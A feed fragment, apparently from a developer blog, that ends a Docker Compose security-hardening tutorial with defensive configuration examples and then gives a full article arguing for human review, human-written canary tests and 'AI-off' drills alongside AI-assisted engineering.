&lt;/h2&gt;

&lt;p&gt;The most common Docker Compose pattern:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;services&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;postgres&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;postgres:16&lt;/span&gt;
    &lt;span class="na"&gt;ports&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;5432:5432"&lt;/span&gt;  &lt;span class="c1"&gt;# ← This is 0.0.0.0:5432&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That &lt;code&gt;"5432:5432"&lt;/code&gt; is shorthand for &lt;code&gt;"0.0.0.0:5432:5432"&lt;/code&gt;. Your database is now accessible from every network interface — including the public internet if your host has a public IP.&lt;/p&gt;

&lt;p&gt;We've seen production Postgres instances exposed to the internet with default credentials. One client's Redis was mining crypto for 3 days before anyone noticed.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Fix
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;services&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;postgres&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;postgres:16&lt;/span&gt;
    &lt;span class="na"&gt;ports&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;127.0.0.1:5432:5432"&lt;/span&gt;  &lt;span class="c1"&gt;# ← Only accessible from localhost&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For services that only talk to each other via Docker network, remove the port binding entirely:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;services&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;postgres&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;postgres:16&lt;/span&gt;
    &lt;span class="c1"&gt;# No ports section at all — only reachable via Docker internal DNS&lt;/span&gt;
    &lt;span class="na"&gt;networks&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;backend&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Rule:&lt;/strong&gt; Only expose ports you need from outside Docker. If the service is internal-only, don't map it.&lt;/p&gt;

&lt;h2&gt;
  
  
  Hole #2: Running as Root
&lt;/h2&gt;

&lt;p&gt;Check your running containers right now:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker compose &lt;span class="nb"&gt;exec &lt;/span&gt;app &lt;span class="nb"&gt;whoami&lt;/span&gt;
&lt;span class="c"&gt;# Output: root&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If an attacker achieves container escape (CVE-2024-21626 in runc, for example), they land on the host as root. Full control. Game over.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Fix
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;services&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;app&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;myapp:latest&lt;/span&gt;
    &lt;span class="na"&gt;user&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;1000:1000"&lt;/span&gt;
    &lt;span class="na"&gt;security_opt&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;no-new-privileges:true&lt;/span&gt;
    &lt;span class="na"&gt;read_only&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
    &lt;span class="na"&gt;tmpfs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;/tmp&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;What each line does:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;user: "1000:1000"&lt;/code&gt; — runs as non-root UID&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;no-new-privileges&lt;/code&gt; — prevents privilege escalation via setuid binaries&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;read_only: true&lt;/code&gt; — container filesystem is immutable&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;tmpfs: /tmp&lt;/code&gt; — gives the app a writable temp directory without persistent write access&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Common objection:&lt;/strong&gt; "My app needs to write files." Use volumes for specific writable paths. Don't give the entire filesystem write access.&lt;/p&gt;

&lt;h2&gt;
  
  
  Hole #3: No Resource Limits
&lt;/h2&gt;

&lt;p&gt;Without limits, a single container with a memory leak eats the entire host:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Container using 14GB on a 16GB host&lt;/span&gt;
docker stats &lt;span class="nt"&gt;--no-stream&lt;/span&gt;
CONTAINER  CPU %  MEM USAGE / LIMIT     MEM %
app        340%   14.2GiB / 15.6GiB     91.03%
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When this happens, the OOM killer starts murdering other containers. Your database goes down. Your monitoring goes down. Everything cascades.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Fix
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;services&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;app&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;myapp:latest&lt;/span&gt;
    &lt;span class="na"&gt;deploy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;resources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;limits&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;memory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;512M&lt;/span&gt;
          &lt;span class="na"&gt;cpus&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;1.0'&lt;/span&gt;
        &lt;span class="na"&gt;reservations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;memory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;256M&lt;/span&gt;
          &lt;span class="na"&gt;cpus&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;0.25'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Limits&lt;/strong&gt; = hard ceiling. Container gets OOM-killed if it exceeds this.&lt;br&gt;
&lt;strong&gt;Reservations&lt;/strong&gt; = guaranteed minimum. Docker won't schedule other work into this space.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Rule of thumb:&lt;/strong&gt; Set memory limit at 2x your app's normal working set. If your Node.js app uses 200MB normally, set limit to 512M. Enough headroom for spikes, tight enough to prevent runaway.&lt;/p&gt;
&lt;h2&gt;
  
  
  The Complete Hardened Template
&lt;/h2&gt;

&lt;p&gt;Here's our baseline &lt;code&gt;docker-compose.yml&lt;/code&gt; security config that we apply to every project:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;services&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;app&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;myapp:latest&lt;/span&gt;
    &lt;span class="na"&gt;user&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;1000:1000"&lt;/span&gt;
    &lt;span class="na"&gt;read_only&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
    &lt;span class="na"&gt;security_opt&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;no-new-privileges:true&lt;/span&gt;
    &lt;span class="na"&gt;cap_drop&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;ALL&lt;/span&gt;
    &lt;span class="na"&gt;cap_add&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;NET_BIND_SERVICE&lt;/span&gt;  &lt;span class="c1"&gt;# Only if binding port &amp;lt;1024&lt;/span&gt;
    &lt;span class="na"&gt;tmpfs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;/tmp&lt;/span&gt;
    &lt;span class="na"&gt;deploy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;resources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;limits&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;memory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;512M&lt;/span&gt;
          &lt;span class="na"&gt;cpus&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;1.0'&lt;/span&gt;
    &lt;span class="na"&gt;networks&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;backend&lt;/span&gt;
    &lt;span class="c1"&gt;# No port binding — reverse proxy handles external access&lt;/span&gt;

  &lt;span class="na"&gt;postgres&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;postgres:16-alpine&lt;/span&gt;
    &lt;span class="na"&gt;user&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;999:999"&lt;/span&gt;  &lt;span class="c1"&gt;# postgres user UID&lt;/span&gt;
    &lt;span class="na"&gt;read_only&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
    &lt;span class="na"&gt;security_opt&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;no-new-privileges:true&lt;/span&gt;
    &lt;span class="na"&gt;cap_drop&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;ALL&lt;/span&gt;
    &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;pgdata:/var/lib/postgresql/data&lt;/span&gt;
    &lt;span class="na"&gt;tmpfs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;/tmp&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;/run/postgresql&lt;/span&gt;
    &lt;span class="na"&gt;deploy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;resources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;limits&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;memory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;1G&lt;/span&gt;
          &lt;span class="na"&gt;cpus&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;2.0'&lt;/span&gt;
    &lt;span class="na"&gt;networks&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;backend&lt;/span&gt;
    &lt;span class="c1"&gt;# No ports exposed — app connects via Docker DNS&lt;/span&gt;

  &lt;span class="na"&gt;traefik&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;traefik:v3&lt;/span&gt;
    &lt;span class="na"&gt;ports&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;0.0.0.0:443:443"&lt;/span&gt;   &lt;span class="c1"&gt;# Only HTTPS exposed publicly&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;127.0.0.1:8080:8080"&lt;/span&gt;  &lt;span class="c1"&gt;# Dashboard localhost only&lt;/span&gt;
    &lt;span class="c1"&gt;# ... rest of config&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Bonus: Automated Scanning
&lt;/h2&gt;

&lt;p&gt;Add this to your CI to catch these issues before deploy:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Install docker-compose-linter&lt;/span&gt;
pip &lt;span class="nb"&gt;install &lt;/span&gt;docker-compose-linter

&lt;span class="c"&gt;# Scan for security issues&lt;/span&gt;
docker-compose-lint &lt;span class="nt"&gt;--security&lt;/span&gt; docker-compose.yml
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Or use Trivy for image scanning:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;trivy config docker-compose.yml
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  How We Can Help
&lt;/h2&gt;

&lt;p&gt;We run free 15-minute Docker security reviews. Share your &lt;code&gt;docker-compose.yml&lt;/code&gt; (redact credentials), and we'll tell you exactly what's exposed, what's at risk, and how to fix it.&lt;/p&gt;

&lt;p&gt;No pitch. Just fixes.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Book a review:&lt;/strong&gt; &lt;a href="https://techsaas.cloud/contact" rel="noopener noreferrer"&gt;techsaas.cloud/contact&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>devops</category>
      <category>infosec</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>The Three Inverse Laws of AI: What Every Engineering Team Needs to Know Before It's Too Late</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Thu, 07 May 2026 06:00:48 +0000</pubDate>
      <link>https://dev.to/yash_pritwani_07a77613fd6/the-three-inverse-laws-of-ai-what-every-engineering-team-needs-to-know-before-its-too-late-3i1n</link>
      <guid>https://dev.to/yash_pritwani_07a77613fd6/the-three-inverse-laws-of-ai-what-every-engineering-team-needs-to-know-before-its-too-late-3i1n</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/three-inverse-laws-ai-engineering-teams" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/three-inverse-laws-ai-engineering-teams?utm_source=devto&amp;amp;utm_medium=article&amp;amp;utm_campaign=three-inverse-laws-ai-engineering-teams" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;




&lt;h1&gt;
  
  
  The Three Inverse Laws of AI: What Every Engineering Team Needs to Know
&lt;/h1&gt;

&lt;p&gt;This concept recently hit the top of Hacker News, and it crystallizes something we've been seeing with our own AI infrastructure for months.&lt;/p&gt;

&lt;p&gt;The three inverse laws:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;The more AI helps you write code, the harder it becomes to understand what you shipped.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The more AI automates testing, the less your team knows when something is actually broken.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The more AI handles operations, the worse your incident response becomes when AI itself fails.&lt;/strong&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;These aren't philosophical concerns. They're operational risks that scale with your AI adoption.&lt;/p&gt;

&lt;h2&gt;
  
  
  Law 1: The Comprehension Inverse
&lt;/h2&gt;

&lt;p&gt;A startup we work with shipped 3x faster last quarter using AI-assisted coding. Their velocity metrics looked elite. Then they hit a production bug in AI-generated code — a subtle race condition in a connection pooling layer that no human on the team had written or reviewed deeply.&lt;/p&gt;

&lt;p&gt;Debugging took 4 days instead of 4 hours. The code worked perfectly in isolation. It passed all AI-generated tests. But it wasn't written with human mental models, and nobody could trace the logic path that led to the race condition.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Guardrail
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Mandatory domain-context code review.&lt;/strong&gt; Not syntax review — domain review. For every AI-generated module, one human must be able to explain:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Why this approach was chosen over alternatives&lt;/li&gt;
&lt;li&gt;What the failure modes are&lt;/li&gt;
&lt;li&gt;How it interacts with adjacent systems&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If nobody can answer those questions, the code isn't ready for production — regardless of how clean it looks.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Code review checklist for AI-generated code
&lt;/span&gt;&lt;span class="n"&gt;REVIEW_QUESTIONS&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;
    &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Can you explain the algorithm without reading the code?&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;What happens when the database is slow?&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;What happens when the input is 10x larger than expected?&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Where does this code store state, and what happens on restart?&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;If this breaks at 3am, what would you check first?&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Law 2: The Testing Inverse
&lt;/h2&gt;

&lt;p&gt;AI-generated tests have a blind spot: they test what the AI thinks the code does, not what the code should do from a business perspective.&lt;/p&gt;

&lt;p&gt;We saw this firsthand. Our AI agent generated 200+ unit tests for a billing module. All green. Coverage was 94%. But the tests were tautological — they verified the code did what the code did, not that it correctly calculated invoices according to the pricing model.&lt;/p&gt;

&lt;p&gt;A human-written test caught that annual billing with mid-cycle upgrades was charging the wrong prorated amount. None of the 200 AI tests caught it because the AI had encoded the bug in both the code and the tests.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Guardrail
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Maintain a "canary test suite" written and maintained exclusively by humans.&lt;/strong&gt; These tests encode business logic, edge cases, and invariants that must always hold true. They're the immune system that catches when AI-generated code and AI-generated tests both miss the same thing.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Canary tests — HUMANS ONLY, never AI-generated
&lt;/span&gt;&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;BillingCanaryTests&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_annual_upgrade_proration&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;Business rule: mid-cycle upgrade prorates from upgrade date,
        not from billing cycle start. Finance confirmed 2026-01-15.&lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
        &lt;span class="n"&gt;invoice&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;calculate_upgrade_proration&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;plan_from&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;starter&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;plan_to&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;growth&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;cycle_start&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nf"&gt;date&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;2026&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;upgrade_date&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nf"&gt;date&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;2026&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;15&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="c1"&gt;# 17 days of Growth pricing, not 75 days
&lt;/span&gt;        &lt;span class="k"&gt;assert&lt;/span&gt; &lt;span class="n"&gt;invoice&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;prorated_days&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;17&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The canary suite should be small (50-100 tests), focused on business-critical paths, and reviewed quarterly by product + engineering together.&lt;/p&gt;

&lt;h2&gt;
  
  
  Law 3: The Operations Inverse
&lt;/h2&gt;

&lt;p&gt;This one hit us directly. We run 9 autonomous AI agents managing infrastructure, content, security, and operations. When the AI is working, everything is smooth — containers restart, configs update, incidents get triaged.&lt;/p&gt;

&lt;p&gt;But when our orchestrator went down for 3 hours, the team was lost. Nobody remembered the manual procedure for restarting the Traefik proxy. Nobody knew which containers had health checks and which didn't. The muscle memory was gone because the AI had been handling everything for months.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Guardrail
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Quarterly "AI-off" drills.&lt;/strong&gt; Disable your AI automation and practice manual operations. This is the engineering equivalent of a fire drill.&lt;/p&gt;

&lt;p&gt;Schedule:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Monthly:&lt;/strong&gt; One team member shadows the AI's operations decisions for a day, documenting what they'd do differently&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Quarterly:&lt;/strong&gt; Full "AI-off" drill for 2 hours — all AI automation paused, team handles operations manually&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Annually:&lt;/strong&gt; Full incident simulation without AI assistance&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;We implemented this after our orchestrator outage. The first drill was rough — MTTR was 4x worse without AI. By the third drill, the team had rebuilt enough manual competency that AI failures became inconveniences, not crises.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Meta-Pattern: AI Amplifies, Doesn't Replace
&lt;/h2&gt;

&lt;p&gt;The inverse laws share a root cause: treating AI as a replacement rather than an amplifier. When AI replaces human understanding, you've traded visible complexity for invisible fragility.&lt;/p&gt;

&lt;p&gt;The correct model:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;AI writes code → humans understand and own it&lt;/li&gt;
&lt;li&gt;AI generates tests → humans maintain the canary suite&lt;/li&gt;
&lt;li&gt;AI handles operations → humans practice without it&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This isn't about slowing down. It's about building resilience at the speed of AI. The teams that get this right will ship 3x faster AND recover from failures in minutes. The teams that don't will ship 3x faster until the first major incident — and then spend weeks recovering.&lt;/p&gt;

&lt;h2&gt;
  
  
  Practical Implementation
&lt;/h2&gt;

&lt;h3&gt;
  
  
  For Engineering Managers
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;Add "AI comprehension review" to your PR checklist&lt;/li&gt;
&lt;li&gt;Create a canary test suite with business-critical invariants&lt;/li&gt;
&lt;li&gt;Schedule the first "AI-off" drill this quarter&lt;/li&gt;
&lt;li&gt;Track "AI-generated code incident rate" as a team metric&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  For CTOs
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;Establish AI governance policies before the first inverse-law incident&lt;/li&gt;
&lt;li&gt;Budget for human review time — AI coding speed is meaningless if review becomes the bottleneck&lt;/li&gt;
&lt;li&gt;Ensure your incident response runbooks have manual fallbacks for every AI-automated step&lt;/li&gt;
&lt;li&gt;Consider AI adoption pace relative to team comprehension capacity&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  For Individual Engineers
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;When AI generates code, read it as if a junior engineer wrote it — with skepticism&lt;/li&gt;
&lt;li&gt;Write at least one test per feature that you'd bet your bonus on&lt;/li&gt;
&lt;li&gt;Know how to do your job without AI tools — they will go down&lt;/li&gt;
&lt;/ol&gt;




